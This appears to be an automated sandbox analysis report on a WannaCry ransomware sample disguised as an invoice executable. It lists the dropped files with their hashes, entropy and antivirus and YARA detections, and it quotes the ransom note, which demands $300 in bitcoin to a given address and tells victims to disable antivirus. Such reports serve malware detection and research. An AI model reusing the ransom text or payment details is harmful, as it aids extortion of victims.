                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):38483
                                                          Entropy (8bit):5.022972736625151
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdb24G2ZKLVdDeo75Y3kmA31dv61QyE:Shef3jHd/G2w6ZrS14w
                                                          MD5:C7A19984EB9F37198652EAF2FD1EE25C
                                                          SHA1:06EAFED025CF8C4D76966BF382AB0C5E1BD6A0AE
                                                          SHA-256:146F61DB72297C9C0FACFFD560487F8D6A2846ECEC92ECC7DB19C8D618DBC3A4
                                                          SHA-512:43DD159F9C2EAC147CBFF1DDA83F6A83DD0C59D2D7ACAC35BA8B407A04EC9A1110A6A8737535D060D100EDE1CB75078CF742C383948C9D4037EF459D150F6020
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):42582
                                                          Entropy (8bit):5.010722377068833
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHds42WG2mzGu/eo75Y3kmA31dv61QyZ:Shef3jHdsiG2moZrS149
                                                          MD5:531BA6B1A5460FC9446946F91CC8C94B
                                                          SHA1:CC56978681BD546FD82D87926B5D9905C92A5803
                                                          SHA-256:6DB650836D64350BBDE2AB324407B8E474FC041098C41ECAC6FD77D632A36415
                                                          SHA-512:EF25C3CF4343DF85954114F59933C7CC8107266C8BCAC3B5EA7718EB74DBEE8CA8A02DA39057E6EF26B64F1DFCCD720DD3BF473F5AE340BA56941E87D6B796C9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):93778
                                                          Entropy (8bit):4.76206134900188
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdW2YG22cViQj3KiG8dpcH8iEriG8E8O83Jz52sxG8h:Shef3jHdWG2+oPZrS14i
                                                          MD5:8419BE28A0DCEC3F55823620922B00FA
                                                          SHA1:2E4791F9CDFCA8ABF345D606F313D22B36C46B92
                                                          SHA-256:1F21838B244C80F8BED6F6977AA8A557B419CF22BA35B1FD4BF0F98989C5BDF8
                                                          SHA-512:8FCA77E54480AEA3C0C7A705263ED8FB83C58974F5F0F62F12CC97C8E0506BA2CDB59B70E59E9A6C44DD7CDE6ADEEEC35B494D31A6A146FF5BA7006136AB9386
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):864
                                                          Entropy (8bit):4.5335184780121995
                                                          Encrypted:false
                                                          SSDEEP:24:ptrPzDVR5Gi3OzGm0Ei5bnBR7brW8PNAi0eEprY+Ai75wRZce/:DZD36W5/vWmMo+m
                                                          MD5:3E0020FC529B1C2A061016DD2469BA96
                                                          SHA1:C3A91C22B63F6FE709E7C29CAFB29A2EE83E6ADE
                                                          SHA-256:402751FA49E0CB68FE052CB3DB87B05E71C1D950984D339940CF6B29409F2A7C
                                                          SHA-512:5CA3C134201ED39D96D72911C0498BAE6F98701513FD7F1DC8512819B673F0EA580510FA94ED9413CCC73DA18B39903772A7CBFA3478176181CEE68C896E14CF
                                                          Malicious:false
                                                          Yara Hits:
                                                          • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\Desktop\r.wnry, Author: Florian Roth
                                                          Reputation:unknown
                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send %s to this bitcoin address: %s.... Next, please find an application file named "%s". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                          Category:dropped
                                                          Size (bytes):3038286
                                                          Entropy (8bit):7.998263053003918
                                                          Encrypted:true
                                                          SSDEEP:49152:zUx4db9A1iRdHAHZXaTnCshuTnSQYUB/UZfCg2clOQin2h37l2Jh9iiRKpbXUSH:z/b96AdHA5XaTJvQYUBBgRlJi+rlliRy
                                                          MD5:AD4C9DE7C8C40813F200BA1C2FA33083
                                                          SHA1:D1AF27518D455D432B62D73C6A1497D032F6120E
                                                          SHA-256:E18FDD912DFE5B45776E68D578C3AF3547886CF1353D7086C8BEE037436DFF4B
                                                          SHA-512:115733D08E5F1A514808A20B070DB7FF453FD149865F49C04365A8C6502FA1E5C3A31DA3E21F688AB040F583CF1224A544AEA9708FFAB21405DDE1C57F98E617
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65816
                                                          Entropy (8bit):7.997276137881339
                                                          Encrypted:true
                                                          SSDEEP:1536:am+vLII5ygV8/tuH+P9zxqDKvARpmKiRMkTERU:a9LAg4tXPTEKvADmFgRU
                                                          MD5:5DCAAC857E695A65F5C3EF1441A73A8F
                                                          SHA1:7B10AAEEE05E7A1EFB43D9F837E9356AD55C07DD
                                                          SHA-256:97EBCE49B14C46BEBC9EC2448D00E1E397123B256E2BE9EBA5140688E7BC0AE6
                                                          SHA-512:06EB5E49D19B71A99770D1B11A5BB64A54BF3352F36E39A153469E54205075C203B08128DC2317259DB206AB5323BDD93AAA252A066F57FB5C52FF28DEEDB5E2
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):3.1664845408760636
                                                          Encrypted:false
                                                          SSDEEP:96:Udocv5e0e1wWtaLYjJN0yDGgI2u9+w5eOIMviS0jPtboyn15EWBwwWwT:6oL0edtJN7qvAZM6S0jP1oynkWBwwWg
                                                          MD5:4FEF5E34143E646DBF9907C4374276F5
                                                          SHA1:47A9AD4125B6BD7C55E4E7DA251E23F089407B8F
                                                          SHA-256:4A468603FDCB7A2EB5770705898CF9EF37AADE532A7964642ECD705A74794B79
                                                          SHA-512:4550DD1787DEB353EBD28363DD2CDCCCA861F6A5D9358120FA6AA23BAA478B2A9EB43CEF5E3F6426F708A0753491710AC05483FAC4A046C26BEC4234122434D5
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 89%
                                                          • Antivirus: Virustotal, Detection: 88%, Browse
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):2.5252509618107535
                                                          Encrypted:false
                                                          SSDEEP:96:UjpvOHheaCDCNIOgTegoddPtboyX7cvp0EWy1HlWwr:UjVWEam7ofP1oyX7olWUHlW0
                                                          MD5:8495400F199AC77853C53B5A3F278F3E
                                                          SHA1:BE5D6279874DA315E3080B06083757AAD9B32C23
                                                          SHA-256:2CA2D550E603D74DEDDA03156023135B38DA3630CB014E3D00B1263358C5F00D
                                                          SHA-512:0669C524A295A049FA4629B26F89788B2A74E1840BCDC50E093A0BD40830DD1279C9597937301C0072DB6ECE70ADEE4ACE67C3C8A4FB2DB6DEAFD8F1E887ABE4
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 87%
                                                          • Antivirus: Virustotal, Detection: 88%, Browse
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):245760
                                                          Entropy (8bit):6.278920408390635
                                                          Encrypted:false
                                                          SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                          MD5:7BF2B57F2A205768755C07F238FB32CC
                                                          SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                          SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                          SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\u.wnry, Author: Joe Security
                                                          • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\u.wnry, Author: ReversingLabs
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          • Antivirus: Virustotal, Detection: 90%, Browse
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):933
                                                          Entropy (8bit):4.711824502619554
                                                          Encrypted:false
                                                          SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                          MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                          SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                          SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                          SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):245760
                                                          Entropy (8bit):6.278920408390635
                                                          Encrypted:false
                                                          SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                          MD5:7BF2B57F2A205768755C07F238FB32CC
                                                          SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                          SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                          SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          • Antivirus: Virustotal, Detection: 90%, Browse
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.80013066252563
                                                          Encrypted:false
                                                          SSDEEP:24:Z8/Sct4O6ep9XRM8DbKr5e5fl+yvVoMHT9PY465aCYNrZoK+:2ShFIhbKrE5fQ4HTR+cbb+
                                                          MD5:B300E58CABF45FF5A8BD9D47CD32CB1B
                                                          SHA1:75AC4DBC04311F52849598DE4A2358CF97445B82
                                                          SHA-256:706966E9CC902908CE965008DA4BE7FAC363A0A5CED0A606CA09ADC85E217698
                                                          SHA-512:BDF5051F0B6D80A3CF5DB438CE4D1B4267B0DBF098DDD514273A7E34E6C6128AB11CE29A4A0FBAEA501B17983DB075BC5CF2226BCBC0BA3FC59C8E0CFAAE6AAC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.846166855944825
                                                          Encrypted:false
                                                          SSDEEP:24:bkYxRTzxm9yB+fQYwvZZojErziqbsRdM+qHQ9iyWvli8Z7MLKuZyBQUJuT5TDa3:bkczq4YwvZ2jErOgC6LHQ9iVv48Z7MLa
                                                          MD5:FFF4719DFD3EF4B04FBA3FAD88337DAE
                                                          SHA1:E28A402128A04276307AB4BCDD7C336B1AADEF90
                                                          SHA-256:A81EAD558D8DC8791FFB0EC685EDA9A1DC83E6E5051F48003C65F36442C3B940
                                                          SHA-512:CFBDF5CA474A9E2F6204E5F498C2C3AAED1584040D0CD18E8167D3B57A9A26DD336AEB81748D91D23FC55A8AFFA4EAAF16AD74673956846AE45ED52E133F725D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.846166855944825
                                                          Encrypted:false
                                                          SSDEEP:24:bkYxRTzxm9yB+fQYwvZZojErziqbsRdM+qHQ9iyWvli8Z7MLKuZyBQUJuT5TDa3:bkczq4YwvZ2jErOgC6LHQ9iVv48Z7MLa
                                                          MD5:FFF4719DFD3EF4B04FBA3FAD88337DAE
                                                          SHA1:E28A402128A04276307AB4BCDD7C336B1AADEF90
                                                          SHA-256:A81EAD558D8DC8791FFB0EC685EDA9A1DC83E6E5051F48003C65F36442C3B940
                                                          SHA-512:CFBDF5CA474A9E2F6204E5F498C2C3AAED1584040D0CD18E8167D3B57A9A26DD336AEB81748D91D23FC55A8AFFA4EAAF16AD74673956846AE45ED52E133F725D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:BS image, Version 31555, Quantization 22622, (Decompresses to 16009 words)
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.8164765808707966
                                                          Encrypted:false
                                                          SSDEEP:24:CkHHIoLi25GU1tgkBmefxQwpyTgTHLqybCL1n:C8Hxr1GkAKQ7TgTHOyb0p
                                                          MD5:1333840F9C482FD6057A57A17A3FBBB8
                                                          SHA1:3BFC9BF5B9396639E2F2CCD02CE459D4EDA3DE0E
                                                          SHA-256:A59F15B31F3B134109F7D0AE6B0730D99FFD8419CF232E214D7F0C8C4FFFC751
                                                          SHA-512:FB362F7FF2320172A96580FDBF8B968D2D066F09FFC65DA1D0B60050925C8BC6F5F5F3DF506551BEA54BA0C4545DABDFAA06081D191456DD79AE6AB967DBACBA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.852141988318146
                                                          Encrypted:false
                                                          SSDEEP:24:bkK19ncSN7rBAtSGGeYEORAEGZFw3Yp5s4x5g9GVnqPAGSoJoQkt5Fts1bZ:bkOfheYynwws4xi9GVnqPZUQaFWd
                                                          MD5:F50520BCD8A1CB5D57A2934CF6DBEA3A
                                                          SHA1:500D7C857EF8F50B5F026E7282964DE059616C32
                                                          SHA-256:3E4031F8DF6C6D17EDF661510966CBD9EC2CC437F34E68570C352835F0FB8D8A
                                                          SHA-512:22E6B7163CADB67F2E3FCFBEA2084E8771DF1F51743204DE87E9E38DFBF55313C0B9BB3EFE6F07F00CB4EE21D69BF2812282E4CE25F51C6F2A09BDC3C919F135
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.852141988318146
                                                          Encrypted:false
                                                          SSDEEP:24:bkK19ncSN7rBAtSGGeYEORAEGZFw3Yp5s4x5g9GVnqPAGSoJoQkt5Fts1bZ:bkOfheYynwws4xi9GVnqPZUQaFWd
                                                          MD5:F50520BCD8A1CB5D57A2934CF6DBEA3A
                                                          SHA1:500D7C857EF8F50B5F026E7282964DE059616C32
                                                          SHA-256:3E4031F8DF6C6D17EDF661510966CBD9EC2CC437F34E68570C352835F0FB8D8A
                                                          SHA-512:22E6B7163CADB67F2E3FCFBEA2084E8771DF1F51743204DE87E9E38DFBF55313C0B9BB3EFE6F07F00CB4EE21D69BF2812282E4CE25F51C6F2A09BDC3C919F135
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.813555557528846
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.846059609082698
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):933
                                                          Entropy (8bit):4.711824502619554
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jan 16 09:59:27 2024, mtime=Tue Jan 16 09:59:27 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                          Category:dropped
                                                          Size (bytes):575
                                                          Entropy (8bit):5.140087190146179
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.817591288804739
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.829938513677851
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.812807498961308
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8634175197376095
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:OpenPGP Secret Key
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.8163487633396285
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.857581383952584
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.7993485033063426
                                                          Encrypted:false
                                                          SSDEEP:24:iuOt/cNfdPcecHrIK5b6XFh0dVPVVNYyY/OUDkU:fM/cN1UecLIqb6XFWHP+yY/OUQU
                                                          MD5:608203364342812ED5FAED87A7F3B3C8
                                                          SHA1:EC2CDC4FEE3895B88E46E1B87EE0712FBF7604E6
                                                          SHA-256:5BAD441A5E3AE85FD3435CC095CD40C55D856BFB0FF7A572151F0BC3F200592A
                                                          SHA-512:068BBF9C2287550954C49F46222DB307FEC2912F3F1B61C3836D8EC1953CD7E62B7885C262D48BF398E48413C7198C8C1D0C504155F2AB26FA88EBEAFAD83D36
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.832585892575282
                                                          Encrypted:false
                                                          SSDEEP:24:bkzbPQkDlu65AhY8PbIRfbl0kqTHX5G0FiCOyPKYhOG1Wz0NaeaGbxQ:bkzbPQkDo6598Pgl0kqDsldyP8Rual
                                                          MD5:984DFF9876A4CD0A445F4AF6D7C45C0D
                                                          SHA1:7D3887742FA52948352E65B607650C4335370F4B
                                                          SHA-256:36086F5DABA20CD036D0E4DDAC83E04E7BFE03808C9F0611ABB3773DD288C901
                                                          SHA-512:9DF792BE0E7E572E6AFC5A12729869A67BE16AC5D64AE63220FB892A2F670B735295BDFF569912055AD12714A3D26040B3F71E867DF19CC1710325DE929AF7DE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.79774463592345
                                                          Encrypted:false
                                                          SSDEEP:24:soKX9TyCtuHGuqdwlPmlv3fovmDAaykc0crC/k78VO5:sX9ptumElPsv3fo+DHbcrC/CG4
                                                          MD5:9FBCF1C52751A4AD88F188E99BE02E73
                                                          SHA1:1A8393556D7C6B21C8852C4515B987FB4ED5ED42
                                                          SHA-256:4EFA7AF968DFC95E022EED232E158965A5412266069B6FD3D63121C8EF136CF8
                                                          SHA-512:6742B364F6903DF8AD8887528F854E88520F4AFFBC1BF4816DA8B4369AF4EA7ECEDC550FF5E36F76242F67010FCC805DA0A3FEDA4363C64D1DEF61F7A9C738AE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.851548870331197
                                                          Encrypted:false
                                                          SSDEEP:24:bkdaMJ41Qh3fCq2+gDe2lt96/R0YwNl9cwmcQ7C:bkdaMJ4yhqaW96J0YwHeA
                                                          MD5:F7AFA1236F29247F064698088E696D65
                                                          SHA1:AE67C285E6E9DFF10D0F7921597595F54A723715
                                                          SHA-256:514A9164F993387FB2CDD74FACBB28B7916869BB05AE2D53E1963456BA0518D7
                                                          SHA-512:A07D339AB2A73E96B19370475E2652738BA24F239FF75E4609803667235E35ABF052EFC1995D2D87194D17867F89930BB8ABB88295D06F4879E779BD8515C6E1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.7842309560531975
                                                          Encrypted:false
                                                          SSDEEP:24:ndHzTg1FkuH201oYNdw7SJvX2cx2/BV36O7NHIb2gAIMi:n5inVkk2pV39ZHMBj
                                                          MD5:95BA734036D042FF4959AA2EA0F28DF2
                                                          SHA1:581AFECFA672896C8A09EB82E079D6DBAA2CE94C
                                                          SHA-256:CC21DEE97C14CC783844A307040327C3E8A3CA3B37E208BDDE31FD940F16F207
                                                          SHA-512:B48FA94BBC999C36D2E918D0320507C4719F9E070E11175BD53BB0061823B4CD3B331A338FCB7F377C25440AFA1FF1A7EADED583B630FD6E661A5F7770BDB9F2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.869041184699475
                                                          Encrypted:false
                                                          SSDEEP:24:bkDVeUH8dnoEOvcvXDV0jUQoLpkNxU+B65AjtBSglqPF07Vwuq:bkDw/nccv2AQ+cUBWjbSglAF07Wuq
                                                          MD5:70B648B97BFB02402B55FCF9478DE602
                                                          SHA1:EC147CE919CCEC616391BE05326E4C8ADF485FCC
                                                          SHA-256:DB0DBB2DE7D509D66AB93D0C4EBD00AF97B82EC3D8818534C4727DFC633B85C6
                                                          SHA-512:20187E9B3F8698412A0DE2C3F36B0FE6946B1C65814F99E0E8FAA38FCBA10D55B05A5859468C7FB9ABE1C2ACD4DFEAF9E3EC06FB57B0DAE77D58A38FA749AA6C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.826740455017789
                                                          Encrypted:false
                                                          SSDEEP:24:ky5LyPprUNOB8Ew7Hdgjtz6j9VWZxnwazEnjZWrjt/CBXxnPatM:ky5ePi4BMgjtuGp/zEnj0KBxPam
                                                          MD5:1B9ADB6B79020F9EE44EEA448B9C2E22
                                                          SHA1:6813DB65A6C90F6F5B276439FD9F6928BCA7D949
                                                          SHA-256:F21E3BA556C85DFCD4D6E88F66A8712BBD64E7D4D4BE269924C736E0826B5652
                                                          SHA-512:BCA1F27555D78D7336CBE139EFC0B40C2EFF78FD518D8E1535FBEB668BEA1620FCABF5FF2DED2A8EA2530B360A0A837D0E32690D1672142EB7C843DFEF641ED9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.845805609189279
                                                          Encrypted:false
                                                          SSDEEP:24:bkleYstSMIL6v2g51UGUQilk2CBa1RiD4kq/Lw1b2EYYfxln:bkWtFjeBCgRxFzwF2Ehl
                                                          MD5:AFEB48AFE166A10E0008CC5AC1F3AD6C
                                                          SHA1:D599B0F23B7A7119D3B14BDB904D47C1473FA98F
                                                          SHA-256:FFF3D479C8698A5B3571963AB95F05878BCB6CD4B670228BFB9018B771957B65
                                                          SHA-512:B7980CF51FA76CC2D9A26CC24F18A49367382C3AF85C2CB53D99249EF75A57770088247A4737475E7FEED2C311516535C34A6F9668F74D2504E9EE86EEFCEDFA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.794803001924923
                                                          Encrypted:false
                                                          SSDEEP:24:Bz4SAImiN7IVEZ6/QqozCs/uCuwutQpYUGueuqYED1UZ7b7n:BW7iFIEo/JYCsdm0pebJmZP7
                                                          MD5:1D13DA032FA361CFB76B5CFF5719FE82
                                                          SHA1:F5F31E4C36928A6C6BDD303114ADED800353D32A
                                                          SHA-256:D545D870A3C5CB77E2CDC2D12CA65A845122E33FC478E97978429F74AC6AF919
                                                          SHA-512:CA5B4CF764DA508031102AEE136D773CEADC25A4F3002F7E8887647CC7543C29A17C14B14285BC8CA73CE36109D345C4D57DD9198D4233803654166FC7EC9B94
                                                          Malicious:false
                                                          Reputation:unknown
